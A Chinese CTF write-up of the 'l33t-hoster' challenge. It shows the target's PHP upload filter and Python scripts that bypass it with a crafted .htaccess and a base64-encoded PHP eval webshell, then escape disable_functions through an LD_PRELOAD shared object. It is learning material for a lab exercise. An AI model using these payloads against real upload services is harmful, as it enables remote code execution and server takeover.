l33t-hoster

这个题做了两天了

拼尽全力卡在最后一步 最后决定先放放 感觉是平台flag有点问题（之前有个题也是flag为空）

明天总结下学习的知识点 先记录下做题过程 看了很多大佬的博客

先看源代码发现 /?source 看这个页面 发现过滤的代码
<?php
if (isset($_GET["source"]))
die(highlight_file(__FILE__));

session_start();

if (!isset($_SESSION["home"])) {
$_SESSION["home"] = bin2hex(random_bytes(20));
}
$userdir = "images/{$_SESSION["home"]}/";
if (!file_exists($userdir)) {
mkdir($userdir);
}

$disallowed_ext = array(
"php",
"php3",
"php4",
"php5",
"php7",
"pht",
"phtm",
"phtml",
"phar",
"phps",
);

if (isset($_POST["upload"])) {
if ($_FILES['image']['error'] !== UPLOAD_ERR_OK) {
die("yuuuge fail");
}

$tmp_name = $_FILES["image"]["tmp_name"];
$name = $_FILES["image"]["name"];
$parts = explode(".", $name);
$ext = array_pop($parts);

if (empty($parts[0])) {
array_shift($parts);
}

if (count($parts) === 0) {
die("lol filename is empty");
}

if (in_array($ext, $disallowed_ext, TRUE)) {
die("lol nice try, but im not stupid dude...");
}

$image = file_get_contents($tmp_name);
if (mb_strpos($image, "<?") !== FALSE) {
die("why would you need php in a pic.....");
}

if (!exif_imagetype($tmp_name)) {
die("not an image.");
}

$image_size = getimagesize($tmp_name);
if ($image_size[0] !== 1337 || $image_size[1] !== 1337) {
die("lol noob, your pic is not l33t enough");
}

$name = implode(".", $parts);
move_uploaded_file($tmp_name, $userdir . $name . "." . $ext);
}

echo "<h3>Your <a href=$userdir>files</a>:</h3><ul>";
foreach(glob($userdir . "*") as $file) {
echo "<li><a href='$file'>$file</a></li>";
}
echo "</ul>";

?>

确实严格 php过滤的差不多我就想到了.htaccess 但要求实在太多了 没啥思路
就去看大佬博客了

https://blog.csdn.net/Uchiha_duan/article/details/131706725
https://blog.csdn.net/mochu7777777/article/details/113772879?ops_request_misc=elastic_search_misc&request_id=0a7ed329acd0355e5f9fe1bd6843d728&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~ElasticSearch~search_v2-1-113772879-null-null.nonecase&utm_term=l33t-hoster&spm=1018.2226.3001.4450

#!/usr/bin/env python3 import requests import base64 VALID_WBMP = b"\x00\x00\x8a\x39\x8a\x39\x0a" URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/" RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816" COOKIES = { "PHPSESSID" : "m43d1fip3edjosh48kpjnqj0b2" } def upload_content(name, content): data = { "image" : (name, content, 'image/png'), "upload" : (None, "Submit Query", None) } response = requests.post(URL, files=data, cookies=COOKIES) HT_ACCESS = VALID_WBMP + b""" AddType application/x-httpd-php .jpg php_value auto_append_file "php://filter/convert.base64-decode/resource=mochu7.jpg" """ TARGET_FILE = VALID_WBMP + b"AA" + base64.b64encode(b""" <?php echo "shell ok!"; eval($_POST['mochu7']); ?> """) upload_content("..htaccess", HT_ACCESS) upload_content("mochu7.jpg", TARGET_FILE) response = requests.post(URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg") print(response.text)

先看末 初大佬的博客
学习到拿到shell 然后我是在ctf2(前buuctf)上做的
也遇到了mochu7=var_dump(file_get_contents('/flag'));返回bool(false)的问题
通过看
https://blog.csdn.net/Uchiha_duan/article/details/131706725
https://github.com/mdsnins/ctf-writeups/blob/master/2019/Insomnihack%202019/l33t-hoster/l33t-hoster.md
学习到了LD_PRELOAD注射

import requests import base64 URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/" RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816" url = URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg" param = {"mochu7":"move_uploaded_file($_FILES['file']['tmp_name'],'/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc.php');echo 'ok';var_dump(scandir('/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816'));"} files = [('file',('bypass_disablefunc.php',open("bypass_disablefunc.php","rb"),'application/octet-stream'))] r = requests.post(url=url, files=files, data=param) print(r.text)

import requests URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/" RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816" url = URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg" param = {"mochu7":"move_uploaded_file($_FILES['file']['tmp_name'],'/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc_x64.so');echo 'ok';var_dump(scandir('/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816'));"} files = [('file',('bypass_disablefunc_x64.so',open("bypass_disablefunc_x64.so","rb"),'application/octet-stream'))] r = requests.post(url=url, files=files, data=param) print(r.text)

/bypass_disablefunc.php?cmd=ls /&outpath=/tmp/xx&sopath=/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so
https://274fcdc69af496cb834ecac5.http-ctf2.dasctf.com/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmd=ls%20/&outpath=/tmp/xx&sopath=/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so

再上传官方的pl文件
/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmd=perl fuck.pl&outpath=/tmp/xx&sopath=/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so

import requests import base64 URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/" RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816" url = URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg" param = {"mochu7":"move_uploaded_file($_FILES['file']['tmp_name'],'/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/fuck.pl');echo 'ok';var_dump(scandir('/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816'));"} files = [('file',('fuck.pl',open("fuck.pl","rb"),'application/octet-stream'))] r = requests.post(url=url, files=files, data=param) print(r.text)